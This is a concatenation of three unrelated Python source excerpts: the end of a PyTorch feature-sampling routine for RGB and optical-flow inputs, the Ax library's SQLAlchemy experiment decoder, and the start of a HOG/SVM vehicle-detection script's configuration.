[self.rgb_features_all[i] for i in sample_pos_inds])
# sampling 800 from them
if len(pos_features_rgb) > self._num_same:
rgb_input_pos = pos_features_rgb[
np.random.choice(len(pos_features_rgb), self._num_same,
replace=False), :]
else:
rgb_input_pos = pos_features_rgb[
np.random.choice(len(pos_features_rgb), self._num_same),
:]
# clearing memory pos flow
del pos_features_rgb
# sampling neg features flow
neg_features_flow = np.vstack(
[self.flow_features_all[i] for i in sample_neg_inds])
# sampling 800 from them
if len(neg_features_flow) > self._num_diff:
flow_input_neg = neg_features_flow[
np.random.choice(len(neg_features_flow), self._num_diff,
replace=False), :]
else:
flow_input_neg = neg_features_flow[
np.random.choice(len(neg_features_flow), self._num_diff),
:]
# clearing memory neg flow
del neg_features_flow
# sampling neg features rgb
neg_features_rgb = np.vstack(
[self.rgb_features_all[i] for i in sample_neg_inds])
# sampling 800 from them
if len(neg_features_rgb) > self._num_diff:
rgb_input_neg = neg_features_rgb[
np.random.choice(len(neg_features_rgb), self._num_diff,
replace=False), :]
else:
rgb_input_neg = neg_features_rgb[
np.random.choice(len(neg_features_rgb), self._num_diff),
:]
# clearing memory neg rgb
del neg_features_rgb
labels_pos = np.ones([len(flow_input_pos), 1])
labels_neg = np.zeros([len(flow_input_neg), 1])
labels = np.reshape(np.vstack([labels_pos, labels_neg]), -1)
labels = np.expand_dims(np.array(labels), axis=0)
weights = labels * self.weight_pos + (1 - labels) * self.weight_neg
# labels = np.expand_dims(np.array(labels), axis=0)
flow_features_input = np.vstack([flow_input_pos, flow_input_neg])
rgb_features_input = np.vstack([rgb_input_pos, rgb_input_neg])
indices = [x for x in range(len(rgb_features_input))]
np.random.shuffle(indices)
# import pdb;pdb.set_trace()
flow_features_input = Variable(
torch.from_numpy(flow_features_input[indices]).cuda())
rgb_features_input = Variable(
torch.from_numpy(rgb_features_input[indices]).cuda())
labels = Variable(torch.from_numpy(labels[0, indices]).float().cuda())
weights = Variable(torch.from_numpy(weights[0, indices]).float().cuda())
cls_index = np.expand_dims(np.array(cls_index), axis=0)
cls_index = Variable(torch.from_numpy(cls_index))
return cls_index, labels, weights, flow_features_input, rgb_features_input
def split(data_dir):
all_files = []
for file in os.listdir(data_dir):
all_files.append(file)
return all_files
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from collections import OrderedDict, defaultdict
from enum import Enum
from typing import List, Optional, Tuple, Type, Union
import pandas as pd
from ax.core.abstract_data import AbstractDataFrameData
from ax.core.arm import Arm
from ax.core.base_trial import BaseTrial, TrialStatus
from ax.core.batch_trial import AbandonedArm, BatchTrial, GeneratorRunStruct
from ax.core.data import Data
from ax.core.experiment import Experiment
from ax.core.generator_run import GeneratorRun, GeneratorRunType
from ax.core.metric import Metric
from ax.core.multi_type_experiment import MultiTypeExperiment
from ax.core.objective import MultiObjective, Objective, ScalarizedObjective
from ax.core.optimization_config import (
MultiObjectiveOptimizationConfig,
OptimizationConfig,
)
from ax.core.outcome_constraint import (
ObjectiveThreshold,
OutcomeConstraint,
ScalarizedOutcomeConstraint,
)
from ax.core.parameter import ChoiceParameter, FixedParameter, Parameter, RangeParameter
from ax.core.parameter_constraint import (
OrderConstraint,
ParameterConstraint,
SumConstraint,
)
from ax.core.runner import Runner
from ax.core.search_space import SearchSpace
from ax.core.simple_experiment import SimpleExperiment
from ax.core.trial import Trial
from ax.exceptions.storage import SQADecodeError
from ax.modelbridge.generation_strategy import GenerationStrategy
from ax.modelbridge.registry import Models, ModelRegistryBase
from ax.storage.json_store.decoder import object_from_json
from ax.storage.metric_registry import REVERSE_METRIC_REGISTRY
from ax.storage.runner_registry import REVERSE_RUNNER_REGISTRY
from ax.storage.sqa_store.sqa_classes import (
SQAAbandonedArm,
SQAArm,
SQAData,
SQAExperiment,
SQAGenerationStrategy,
SQAGeneratorRun,
SQAMetric,
SQAParameter,
SQAParameterConstraint,
SQARunner,
SQATrial,
)
from ax.storage.sqa_store.sqa_config import SQAConfig
from ax.storage.utils import DomainType, MetricIntent, ParameterConstraintType
from ax.utils.common.constants import Keys
from ax.utils.common.typeutils import not_none
class Decoder:
"""Class that contains methods for loading an Ax experiment from SQLAlchemy.
Instantiate with an instance of Config to customize the functionality.
For even more flexibility, create a subclass.
Attributes:
config: Metadata needed to save and load an experiment to SQLAlchemy.
"""
def __init__(self, config: SQAConfig) -> None:
self.config = config
def get_enum_name(
self, value: Optional[int], enum: Optional[Enum]
) -> Optional[str]:
"""Given an enum value (int) and an enum (of ints), return the
corresponding enum name. If the value is not present in the enum,
throw an error.
"""
if value is None or enum is None:
return None
try:
return enum(value).name # pyre-ignore T29651755
except ValueError:
raise SQADecodeError(f"Value {value} is invalid for enum {enum}.")
def _init_experiment_from_sqa(self, experiment_sqa: SQAExperiment) -> Experiment:
"""First step of conversion within experiment_from_sqa."""
opt_config, tracking_metrics = self.opt_config_and_tracking_metrics_from_sqa(
metrics_sqa=experiment_sqa.metrics
)
search_space = self.search_space_from_sqa(
parameters_sqa=experiment_sqa.parameters,
parameter_constraints_sqa=experiment_sqa.parameter_constraints,
)
if search_space is None:
raise SQADecodeError( # pragma: no cover
"Experiment SearchSpace cannot be None."
)
status_quo = (
Arm(
# pyre-fixme[6]: Expected `Dict[str, Optional[Union[bool, float,
# int, str]]]` for 1st param but got `Optional[Dict[str,
# Optional[Union[bool, float, int, str]]]]`.
parameters=experiment_sqa.status_quo_parameters,
name=experiment_sqa.status_quo_name,
)
if experiment_sqa.status_quo_parameters is not None
else None
)
if len(experiment_sqa.runners) == 0:
runner = None
elif len(experiment_sqa.runners) == 1:
runner = self.runner_from_sqa(experiment_sqa.runners[0])
else:
raise ValueError( # pragma: no cover
"Multiple runners on experiment "
"only supported for MultiTypeExperiment."
)
# `experiment_sqa.properties` is `sqlalchemy.ext.mutable.MutableDict`
# so need to convert it to regular dict.
properties = dict(experiment_sqa.properties or {})
# Remove 'subclass' from experiment's properties, since its only
# used for decoding to the correct experiment subclass in storage.
subclass = properties.pop(Keys.SUBCLASS, None)
default_data_type = experiment_sqa.default_data_type
if subclass == "SimpleExperiment":
if opt_config is None:
raise SQADecodeError( # pragma: no cover
"SimpleExperiment must have an optimization config."
)
experiment = SimpleExperiment(
name=experiment_sqa.name,
search_space=search_space,
objective_name=opt_config.objective.metric.name,
minimize=opt_config.objective.minimize,
outcome_constraints=opt_config.outcome_constraints,
status_quo=status_quo,
properties=properties,
default_data_type=default_data_type,
)
experiment.description = experiment_sqa.description
experiment.is_test = experiment_sqa.is_test
else:
experiment = Experiment(
name=experiment_sqa.name,
description=experiment_sqa.description,
search_space=search_space,
optimization_config=opt_config,
tracking_metrics=tracking_metrics,
runner=runner,
status_quo=status_quo,
is_test=experiment_sqa.is_test,
properties=properties,
default_data_type=default_data_type,
)
return experiment
def _init_mt_experiment_from_sqa(
self, experiment_sqa: SQAExperiment
) -> MultiTypeExperiment:
"""First step of conversion within experiment_from_sqa."""
opt_config, tracking_metrics = self.opt_config_and_tracking_metrics_from_sqa(
metrics_sqa=experiment_sqa.metrics
)
search_space = self.search_space_from_sqa(
parameters_sqa=experiment_sqa.parameters,
parameter_constraints_sqa=experiment_sqa.parameter_constraints,
)
if search_space is None:
raise SQADecodeError( # pragma: no cover
"Experiment SearchSpace cannot be None."
)
status_quo = (
Arm(
# pyre-fixme[6]: Expected `Dict[str, Optional[Union[bool, float,
# int, str]]]` for 1st param but got `Optional[Dict[str,
# Optional[Union[bool, float, int, str]]]]`.
parameters=experiment_sqa.status_quo_parameters,
name=experiment_sqa.status_quo_name,
)
if experiment_sqa.status_quo_parameters is not None
else None
)
trial_type_to_runner = {
not_none(sqa_runner.trial_type): self.runner_from_sqa(sqa_runner)
for sqa_runner in experiment_sqa.runners
}
default_trial_type = not_none(experiment_sqa.default_trial_type)
properties = dict(experiment_sqa.properties or {})
if properties:
# Remove 'subclass' from experiment's properties, since its only
# used for decoding to the correct experiment subclass in storage.
properties.pop(Keys.SUBCLASS, None)
default_data_type = experiment_sqa.default_data_type
experiment = MultiTypeExperiment(
name=experiment_sqa.name,
description=experiment_sqa.description,
search_space=search_space,
default_trial_type=default_trial_type,
default_runner=trial_type_to_runner[default_trial_type],
optimization_config=opt_config,
status_quo=status_quo,
properties=properties,
default_data_type=default_data_type,
)
experiment._trial_type_to_runner = trial_type_to_runner
sqa_metric_dict = {metric.name: metric for metric in experiment_sqa.metrics}
for tracking_metric in tracking_metrics:
sqa_metric = sqa_metric_dict[tracking_metric.name]
experiment.add_tracking_metric(
tracking_metric,
trial_type=not_none(sqa_metric.trial_type),
canonical_name=sqa_metric.canonical_name,
)
return experiment
def experiment_from_sqa(
self, experiment_sqa: SQAExperiment, reduced_state: bool = False
) -> Experiment:
"""Convert SQLAlchemy Experiment to Ax Experiment.
Args:
experiment_sqa: `SQAExperiment` to decode.
reduced_state: Whether to load experiment with a slightly reduced state
(without abandoned arms on experiment and without model state,
search space, and optimization config on generator runs).
"""
subclass = (experiment_sqa.properties or {}).get(Keys.SUBCLASS)
if subclass == "MultiTypeExperiment":
experiment = self._init_mt_experiment_from_sqa(experiment_sqa)
else:
experiment = self._init_experiment_from_sqa(experiment_sqa)
trials = [
self.trial_from_sqa(
trial_sqa=trial, experiment=experiment, reduced_state=reduced_state
)
for trial in experiment_sqa.trials
]
data_by_trial = defaultdict(dict)
for data_sqa in experiment_sqa.data:
trial_index = data_sqa.trial_index
timestamp = data_sqa.time_created
# TODO: Use metrics-like Data type field in Data instead.
default_data_constructor = experiment.default_data_constructor
data_by_trial[trial_index][timestamp] = self.data_from_sqa(
data_sqa=data_sqa, data_constructor=default_data_constructor
)
data_by_trial = {
trial_index: OrderedDict(sorted(data_by_timestamp.items()))
for trial_index, data_by_timestamp in data_by_trial.items()
}
experiment._trials = {trial.index: trial for trial in trials}
experiment._arms_by_name = {}
for trial in trials:
if trial.ttl_seconds is not None:
experiment._trials_have_ttl = True
for arm in trial.arms:
experiment._register_arm(arm)
if experiment.status_quo is not None:
sq = not_none(experiment.status_quo)
experiment._register_arm(sq)
experiment._time_created = experiment_sqa.time_created
experiment._experiment_type = self.get_enum_name(
value=experiment_sqa.experiment_type, enum=self.config.experiment_type_enum
)
experiment._data_by_trial = dict(data_by_trial)
experiment.db_id = experiment_sqa.id
return experiment
def parameter_from_sqa(self, parameter_sqa: SQAParameter) -> Parameter:
"""Convert SQLAlchemy Parameter to Ax Parameter."""
if parameter_sqa.domain_type == DomainType.RANGE:
if parameter_sqa.lower is None or parameter_sqa.upper is None:
raise SQADecodeError( # pragma: no cover
"`lower` and `upper` must be set for RangeParameter."
)
parameter = RangeParameter(
name=parameter_sqa.name,
parameter_type=parameter_sqa.parameter_type,
# pyre-fixme[6]: Expected `float` for 3rd param but got
# `Optional[float]`.
lower=parameter_sqa.lower,
upper=parameter_sqa.upper,
log_scale=parameter_sqa.log_scale or False,
digits=parameter_sqa.digits,
is_fidelity=parameter_sqa.is_fidelity or False,
target_value=parameter_sqa.target_value,
)
elif parameter_sqa.domain_type == DomainType.CHOICE:
if parameter_sqa.choice_values is None:
raise SQADecodeError( # pragma: no cover
"`values` must be set for ChoiceParameter."
)
parameter = ChoiceParameter(
name=parameter_sqa.name,
parameter_type=parameter_sqa.parameter_type,
# pyre-fixme[6]: Expected `List[Optional[Union[bool, float, int,
# str]]]` for 3rd param but got `Optional[List[Optional[Union[bool,
# float, int, str]]]]`.
values=parameter_sqa.choice_values,
is_fidelity=parameter_sqa.is_fidelity or False,
target_value=parameter_sqa.target_value,
)
elif parameter_sqa.domain_type == DomainType.FIXED:
# Don't throw an error if parameter_sqa.fixed_value is None;
# that might be the actual value!
parameter = FixedParameter(
name=parameter_sqa.name,
parameter_type=parameter_sqa.parameter_type,
value=parameter_sqa.fixed_value,
is_fidelity=parameter_sqa.is_fidelity or False,
target_value=parameter_sqa.target_value,
)
else:
raise SQADecodeError(
f"Cannot decode SQAParameter because {parameter_sqa.domain_type} "
"is an invalid domain type."
)
parameter.db_id = parameter_sqa.id
return parameter
def parameter_constraint_from_sqa(
self,
parameter_constraint_sqa: SQAParameterConstraint,
parameters: List[Parameter],
) -> ParameterConstraint:
"""Convert SQLAlchemy ParameterConstraint to Ax ParameterConstraint."""
parameter_map = {p.name: p for p in parameters}
if parameter_constraint_sqa.type == ParameterConstraintType.ORDER:
lower_name = None
upper_name = None
for k, v in parameter_constraint_sqa.constraint_dict.items():
if v == 1:
lower_name = k
elif v == -1:
upper_name = k
if not lower_name or not upper_name:
raise SQADecodeError(
"Cannot decode SQAParameterConstraint because `lower_name` or "
"`upper_name` was not found."
)
# pyre-fixme[6]: Expected `str` for 1st param but got `None`.
lower_parameter = parameter_map[lower_name]
# pyre-fixme[6]: Expected `str` for 1st param but got `None`.
upper_parameter = parameter_map[upper_name]
constraint = OrderConstraint(
lower_parameter=lower_parameter, upper_parameter=upper_parameter
)
elif parameter_constraint_sqa.type == ParameterConstraintType.SUM:
# This operation is potentially very inefficient.
# It is O(#constrained_parameters * #total_parameters)
parameter_names = list(parameter_constraint_sqa.constraint_dict.keys())
constraint_parameters = [
next(
search_space_param
for search_space_param in parameters
if search_space_param.name == c_p_name
)
for c_p_name in parameter_names
]
a_values = list(parameter_constraint_sqa.constraint_dict.values())
if len(a_values) == 0:
raise SQADecodeError(
"Cannot decode SQAParameterConstraint because `constraint_dict` "
"is empty."
)
a = a_values[0]
is_upper_bound = a == 1
bound = parameter_constraint_sqa.bound * a
constraint = SumConstraint(
parameters=constraint_parameters,
is_upper_bound=is_upper_bound,
bound=bound,
)
else:
constraint = ParameterConstraint(
constraint_dict=dict(parameter_constraint_sqa.constraint_dict),
bound=parameter_constraint_sqa.bound,
)
constraint.db_id = parameter_constraint_sqa.id
return constraint
def search_space_from_sqa(
self,
parameters_sqa: List[SQAParameter],
parameter_constraints_sqa: List[SQAParameterConstraint],
) -> Optional[SearchSpace]:
"""Convert a list of SQLAlchemy Parameters and ParameterConstraints to an
Ax SearchSpace.
"""
parameters = [
self.parameter_from_sqa(parameter_sqa=parameter_sqa)
for parameter_sqa in parameters_sqa
]
parameter_constraints = [
self.parameter_constraint_from_sqa(
parameter_constraint_sqa=parameter_constraint_sqa, parameters=parameters
)
for parameter_constraint_sqa in parameter_constraints_sqa
]
if len(parameters) == 0:
return None
return SearchSpace(
parameters=parameters, parameter_constraints=parameter_constraints
)
def metric_from_sqa_util(self, metric_sqa: SQAMetric) -> Metric:
"""Convert SQLAlchemy Metric to Ax Metric"""
metric_class = REVERSE_METRIC_REGISTRY.get(metric_sqa.metric_type)
if metric_class is None:
raise SQADecodeError(
f"Cannot decode SQAMetric because {metric_sqa.metric_type} "
f"is an invalid type."
)
args = dict(metric_sqa.properties or {})
args["name"] = metric_sqa.name
args["lower_is_better"] = metric_sqa.lower_is_better
args = metric_class.deserialize_init_args(args=args)
metric = metric_class(**args)
metric.db_id = metric_sqa.id
return metric
def metric_from_sqa(
self, metric_sqa: SQAMetric
) -> Union[Metric, Objective, OutcomeConstraint]:
"""Convert SQLAlchemy Metric to Ax Metric, Objective, or OutcomeConstraint."""
metric = self.metric_from_sqa_util(metric_sqa)
if metric_sqa.intent == MetricIntent.TRACKING:
return metric
elif metric_sqa.intent == MetricIntent.OBJECTIVE:
if metric_sqa.minimize is None:
raise SQADecodeError( # pragma: no cover
"Cannot decode SQAMetric to Objective because minimize is None."
)
if metric_sqa.scalarized_objective_weight is not None:
raise SQADecodeError( # pragma: no cover
"The metric corresponding to regular objective does not \
have weight attribute"
)
return Objective(metric=metric, minimize=metric_sqa.minimize)
elif (
metric_sqa.intent == MetricIntent.MULTI_OBJECTIVE
): # metric_sqa is a parent whose children are individual
# metrics in MultiObjective
if metric_sqa.minimize is None:
raise SQADecodeError( # pragma: no cover
"Cannot decode SQAMetric to MultiObjective \
because minimize is None."
)
metrics_sqa_children = metric_sqa.scalarized_objective_children_metrics
if metrics_sqa_children is None:
raise SQADecodeError( # pragma: no cover
"Cannot decode SQAMetric to MultiObjective \
because the parent metric has no children metrics."
)
# Extracting metric and weight for each child
metrics = [
self.metric_from_sqa_util(child) for child in metrics_sqa_children
]
multi_objective = MultiObjective(
metrics=list(metrics),
# pyre-fixme[6]: Expected `bool` for 2nd param but got `Optional[bool]`.
minimize=metric_sqa.minimize,
)
multi_objective.db_id = metric_sqa.id
return multi_objective
elif (
metric_sqa.intent == MetricIntent.SCALARIZED_OBJECTIVE
): # metric_sqa is a parent whose children are individual
# metrics in Scalarized Objective
if metric_sqa.minimize is None:
raise SQADecodeError( # pragma: no cover
"Cannot decode SQAMetric to Scalarized Objective \
because minimize is None."
)
metrics_sqa_children = metric_sqa.scalarized_objective_children_metrics
if metrics_sqa_children is None:
raise SQADecodeError( # pragma: no cover
"Cannot decode SQAMetric to Scalarized Objective \
because the parent metric has no children metrics."
)
# Extracting metric and weight for each child
metrics, weights = zip(
*[
(
self.metric_from_sqa_util(child),
child.scalarized_objective_weight,
)
for child in metrics_sqa_children
]
)
scalarized_objective = ScalarizedObjective(
metrics=list(metrics),
weights=list(weights),
# pyre-fixme[6]: Expected `bool` for 3nd param but got `Optional[bool]`.
minimize=metric_sqa.minimize,
)
scalarized_objective.db_id = metric_sqa.id
return scalarized_objective
elif metric_sqa.intent == MetricIntent.OUTCOME_CONSTRAINT:
if (
metric_sqa.bound is None
or metric_sqa.op is None
or metric_sqa.relative is None
):
raise SQADecodeError( # pragma: no cover
"Cannot decode SQAMetric to OutcomeConstraint because "
"bound, op, or relative is None."
)
return OutcomeConstraint(
metric=metric,
# pyre-fixme[6]: Expected `float` for 2nd param but got
# `Optional[float]`.
bound=metric_sqa.bound,
op=metric_sqa.op,
relative=metric_sqa.relative,
)
elif metric_sqa.intent == MetricIntent.SCALARIZED_OUTCOME_CONSTRAINT:
if (
metric_sqa.bound is None
or metric_sqa.op is None
or metric_sqa.relative is None
):
raise SQADecodeError( # pragma: no cover
"Cannot decode SQAMetric to Scalarized OutcomeConstraint because "
"bound, op, or relative is None."
)
metrics_sqa_children = (
metric_sqa.scalarized_outcome_constraint_children_metrics
)
if metrics_sqa_children is None:
raise SQADecodeError( # pragma: no cover
"Cannot decode SQAMetric to Scalarized OutcomeConstraint \
because the parent metric has no children metrics."
)
# Extracting metric and weight for each child
metrics, weights = zip(
*[
(
self.metric_from_sqa_util(child),
child.scalarized_outcome_constraint_weight,
)
for child in metrics_sqa_children
]
)
scalarized_outcome_constraint = ScalarizedOutcomeConstraint(
metrics=list(metrics),
weights=list(weights),
# pyre-fixme[6]: Expected `float` for 2nd param but got
# `Optional[float]`.
bound=metric_sqa.bound,
op=metric_sqa.op,
relative=metric_sqa.relative,
)
scalarized_outcome_constraint.db_id = metric_sqa.id
return scalarized_outcome_constraint
elif metric_sqa.intent == MetricIntent.OBJECTIVE_THRESHOLD:
if metric_sqa.bound is None or metric_sqa.relative is None:
raise SQADecodeError( # pragma: no cover
"Cannot decode SQAMetric to ObjectiveThreshold because "
"bound, op, or relative is None."
)
return ObjectiveThreshold(
metric=metric,
# pyre-fixme[6]: Expected `float` for 2nd param but got
# `Optional[float]`.
bound=metric_sqa.bound,
relative=metric_sqa.relative,
op=metric_sqa.op,
)
else:
raise SQADecodeError(
f"Cannot decode SQAMetric because {metric_sqa.intent} "
f"is an invalid intent."
)
def opt_config_and_tracking_metrics_from_sqa(
self, metrics_sqa: List[SQAMetric]
) -> Tuple[Optional[OptimizationConfig], List[Metric]]:
"""Convert a list of SQLAlchemy Metrics to a a tuple of Ax OptimizationConfig
and tracking metrics.
"""
objective = None
objective_thresholds = []
outcome_constraints = []
tracking_metrics = []
for metric_sqa in metrics_sqa:
metric = self.metric_from_sqa(metric_sqa=metric_sqa)
if isinstance(metric, Objective):
objective = metric
elif isinstance(metric, ObjectiveThreshold):
objective_thresholds.append(metric)
elif isinstance(metric, OutcomeConstraint):
outcome_constraints.append(metric)
else:
tracking_metrics.append(metric)
if objective is None:
return None, tracking_metrics
if objective_thresholds or type(objective) == MultiObjective:
optimization_config = MultiObjectiveOptimizationConfig(
objective=objective,
outcome_constraints=outcome_constraints,
objective_thresholds=objective_thresholds,
)
else:
optimization_config = OptimizationConfig(
objective=objective, outcome_constraints=outcome_constraints
)
return (optimization_config, tracking_metrics)
def arm_from_sqa(self, arm_sqa: SQAArm) -> Arm:
"""Convert SQLAlchemy Arm to Ax Arm."""
arm = Arm(parameters=arm_sqa.parameters, name=arm_sqa.name)
arm.db_id = arm_sqa.id
return arm
def abandoned_arm_from_sqa(
self, abandoned_arm_sqa: SQAAbandonedArm
) -> AbandonedArm:
"""Convert SQLAlchemy AbandonedArm to Ax AbandonedArm."""
arm = AbandonedArm(
name=abandoned_arm_sqa.name,
reason=abandoned_arm_sqa.abandoned_reason,
time=abandoned_arm_sqa.time_abandoned,
)
arm.db_id = abandoned_arm_sqa.id
return arm
def generator_run_from_sqa(
self, generator_run_sqa: SQAGeneratorRun, reduced_state: bool = False
) -> GeneratorRun:
"""Convert SQLAlchemy GeneratorRun to Ax GeneratorRun.
Args:
generator_run_sqa: `SQAGeneratorRun` to decode.
reduced_state: Whether to load generator runs with a slightly reduced state
(without model state, search space, and optimization config).
"""
arms = []
weights = []
opt_config = None
search_space = None
for arm_sqa in generator_run_sqa.arms:
arms.append(self.arm_from_sqa(arm_sqa=arm_sqa))
weights.append(arm_sqa.weight)
if not reduced_state:
(
opt_config,
tracking_metrics,
) = self.opt_config_and_tracking_metrics_from_sqa(
metrics_sqa=generator_run_sqa.metrics
)
if len(tracking_metrics) > 0:
raise SQADecodeError( # pragma: no cover
"GeneratorRun should not have tracking metrics."
)
search_space = self.search_space_from_sqa(
parameters_sqa=generator_run_sqa.parameters,
parameter_constraints_sqa=generator_run_sqa.parameter_constraints,
)
best_arm_predictions = None
model_predictions = None
if (
generator_run_sqa.best_arm_parameters is not None
and generator_run_sqa.best_arm_predictions is not None
):
best_arm = Arm(
name=generator_run_sqa.best_arm_name,
parameters=not_none(generator_run_sqa.best_arm_parameters),
)
best_arm_predictions = (
best_arm,
tuple(not_none(generator_run_sqa.best_arm_predictions)),
)
model_predictions = (
tuple(not_none(generator_run_sqa.model_predictions))
if generator_run_sqa.model_predictions is not None
else None
)
generator_run = GeneratorRun(
arms=arms,
weights=weights,
optimization_config=opt_config,
search_space=search_space,
fit_time=generator_run_sqa.fit_time,
gen_time=generator_run_sqa.gen_time,
best_arm_predictions=best_arm_predictions, # pyre-ignore[6]
model_predictions=model_predictions,
model_key=generator_run_sqa.model_key,
model_kwargs=None
if reduced_state
else object_from_json(generator_run_sqa.model_kwargs),
bridge_kwargs=None
if reduced_state
else object_from_json(generator_run_sqa.bridge_kwargs),
gen_metadata=None
if reduced_state
else object_from_json(generator_run_sqa.gen_metadata),
model_state_after_gen=None
if reduced_state
else object_from_json(generator_run_sqa.model_state_after_gen),
generation_step_index=generator_run_sqa.generation_step_index,
candidate_metadata_by_arm_signature=object_from_json(
generator_run_sqa.candidate_metadata_by_arm_signature
),
)
generator_run._time_created = generator_run_sqa.time_created
generator_run._generator_run_type = self.get_enum_name(
value=generator_run_sqa.generator_run_type,
enum=self.config.generator_run_type_enum,
)
generator_run._index = generator_run_sqa.index
generator_run.db_id = generator_run_sqa.id
return generator_run
def generation_strategy_from_sqa(
self,
gs_sqa: SQAGenerationStrategy,
experiment: Optional[Experiment] = None,
reduced_state: bool = False,
) -> GenerationStrategy:
"""Convert SQALchemy generation strategy to Ax `GenerationStrategy`."""
steps = object_from_json(gs_sqa.steps)
gs = GenerationStrategy(name=gs_sqa.name, steps=steps)
gs._curr = gs._steps[gs_sqa.curr_index]
if reduced_state and gs_sqa.generator_runs:
# Only fully load the last of the generator runs, load the rest with
# reduced state.
gs._generator_runs = [
self.generator_run_from_sqa(generator_run_sqa=gr, reduced_state=True)
for gr in gs_sqa.generator_runs[:-1]
]
gs._generator_runs.append(
self.generator_run_from_sqa(
generator_run_sqa=gs_sqa.generator_runs[-1], reduced_state=False
)
)
else:
gs._generator_runs = [
self.generator_run_from_sqa(gr) for gr in gs_sqa.generator_runs
]
if len(gs._generator_runs) > 0:
# Generation strategy had an initialized model.
if experiment is None:
raise SQADecodeError(
"Cannot decode a generation strategy with a non-zero number of "
"generator runs without an experiment."
)
gs._experiment = experiment
# If model in the current step was not directly from the `Models` enum,
# pass its type to `restore_model_from_generator_run`, which will then
# attempt to use this type to recreate the model.
if type(gs._curr.model) != Models:
models_enum = type(gs._curr.model)
assert issubclass(models_enum, ModelRegistryBase)
# pyre-ignore[6]: `models_enum` typing hackiness
gs._restore_model_from_generator_run(models_enum=models_enum)
else:
gs._restore_model_from_generator_run()
gs.db_id = gs_sqa.id
return gs
def runner_from_sqa(self, runner_sqa: SQARunner) -> Runner:
"""Convert SQLAlchemy Runner to Ax Runner."""
runner_class = REVERSE_RUNNER_REGISTRY.get(runner_sqa.runner_type)
if runner_class is None:
raise SQADecodeError(
f"Cannot decode SQARunner because {runner_sqa.runner_type} "
f"is an invalid type."
)
args = runner_class.deserialize_init_args(
args=dict(runner_sqa.properties or {})
)
# pyre-ignore[45]: Cannot instantiate abstract class `Runner`.
runner = runner_class(**args)
runner.db_id = runner_sqa.id
return runner
def trial_from_sqa(
self, trial_sqa: SQATrial, experiment: Experiment, reduced_state: bool = False
) -> BaseTrial:
"""Convert SQLAlchemy Trial to Ax Trial.
Args:
trial_sqa: `SQATrial` to decode.
reduced_state: Whether to load trial's generator run(s) with a slightly
reduced state (without model state, search space, and optimization config).
"""
if trial_sqa.is_batch:
trial = BatchTrial(
experiment=experiment,
optimize_for_power=trial_sqa.optimize_for_power,
ttl_seconds=trial_sqa.ttl_seconds,
index=trial_sqa.index,
)
generator_run_structs = [
GeneratorRunStruct(
generator_run=self.generator_run_from_sqa(
generator_run_sqa=generator_run_sqa,
reduced_state=reduced_state,
),
weight=generator_run_sqa.weight or 1.0,
)
for generator_run_sqa in trial_sqa.generator_runs
]
if trial_sqa.status_quo_name is not None:
new_generator_run_structs = []
for struct in generator_run_structs:
if (
struct.generator_run.generator_run_type
== GeneratorRunType.STATUS_QUO.name
):
status_quo_weight = struct.generator_run.weights[0]
trial._status_quo = struct.generator_run.arms[0]
trial._status_quo_weight_override = status_quo_weight
trial._status_quo_generator_run_db_id = (
struct.generator_run.db_id
)
trial._status_quo_arm_db_id = struct.generator_run.arms[0].db_id
else:
new_generator_run_structs.append(struct)
generator_run_structs = new_generator_run_structs
trial._generator_run_structs = generator_run_structs
if not reduced_state:
trial._abandoned_arms_metadata = {
abandoned_arm_sqa.name: self.abandoned_arm_from_sqa(
abandoned_arm_sqa=abandoned_arm_sqa
)
for abandoned_arm_sqa in trial_sqa.abandoned_arms
}
trial._refresh_arms_by_name() # Trigger cache build
else:
trial = Trial(
experiment=experiment,
ttl_seconds=trial_sqa.ttl_seconds,
index=trial_sqa.index,
)
if trial_sqa.generator_runs:
if len(trial_sqa.generator_runs) != 1:
raise SQADecodeError( # pragma: no cover
"Cannot decode SQATrial to Trial because trial is not batched "
"but has more than one generator run."
)
trial._generator_run = self.generator_run_from_sqa(
generator_run_sqa=trial_sqa.generator_runs[0],
reduced_state=reduced_state,
)
trial._trial_type = trial_sqa.trial_type
# Swap `DISPATCHED` for `RUNNING`, since `DISPATCHED` is deprecated and nearly
# equivalent to `RUNNING`.
trial._status = (
trial_sqa.status
if trial_sqa.status != TrialStatus.DISPATCHED
else TrialStatus.RUNNING
)
trial._time_created = trial_sqa.time_created
trial._time_completed = trial_sqa.time_completed
trial._time_staged = trial_sqa.time_staged
trial._time_run_started = trial_sqa.time_run_started
trial._abandoned_reason = trial_sqa.abandoned_reason
# pyre-fixme[9]: _run_metadata has type `Dict[str, Any]`; used as
# `Optional[Dict[str, Any]]`.
# pyre-fixme[8]: Attribute has type `Dict[str, typing.Any]`; used as
# `Optional[typing.Dict[Variable[_KT], Variable[_VT]]]`.
trial._run_metadata = (
# pyre-fixme[6]: Expected `Mapping[Variable[_KT], Variable[_VT]]` for
# 1st param but got `Optional[Dict[str, typing.Any]]`.
dict(trial_sqa.run_metadata)
if trial_sqa.run_metadata is not None
else None
)
trial._num_arms_created = trial_sqa.num_arms_created
trial._runner = (
self.runner_from_sqa(trial_sqa.runner) if trial_sqa.runner else None
)
trial._generation_step_index = trial_sqa.generation_step_index
trial._properties = dict(trial_sqa.properties or {})
trial.db_id = trial_sqa.id
return trial
def data_from_sqa(
self,
data_sqa: SQAData,
data_constructor: Optional[Type[AbstractDataFrameData]] = None,
) -> AbstractDataFrameData:
"""Convert SQLAlchemy Data to AE Data."""
# TODO: extract data type from SQAData after DataRegistry added.
data_constructor = data_constructor or Data
# pyre-ignore[45]: Cannot instantiate abstract class. But this is concrete.
dat = data_constructor(
description=data_sqa.description,
# NOTE: Need dtype=False, otherwise infers arm_names like
# "4_1" should be int 41.
df=pd.read_json(data_sqa.data_json, dtype=False),
)
dat.db_id = data_sqa.id
return dat
|
<gh_stars>0
# MAIN PROGRAM
# AUTHOR: <NAME>
import matplotlib.pyplot as plt
import glob
import time
import collections
from sklearn.svm import LinearSVC
from sklearn.preprocessing import StandardScaler
from scipy.ndimage.measurements import label
from sklearn.cross_validation import train_test_split
from moviepy.editor import VideoFileClip
from function import *
cars = glob.glob('vehicles/vehicles/*/*.png')
notcars = glob.glob('temp-non-vehicles/non-vehicles/*/*.png')
color_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb
orient = 9 # HOG orientations
pix_per_cell = 8 # HOG pixels per cell
cell_per_block = 2 # HOG cells per block
hog_channel = "ALL" # Can be 0, 1, 2, or "ALL"
spatial_size = (32, 32) # Spatial binning dimensions
hist_bins = 32 # Number of histogram bins
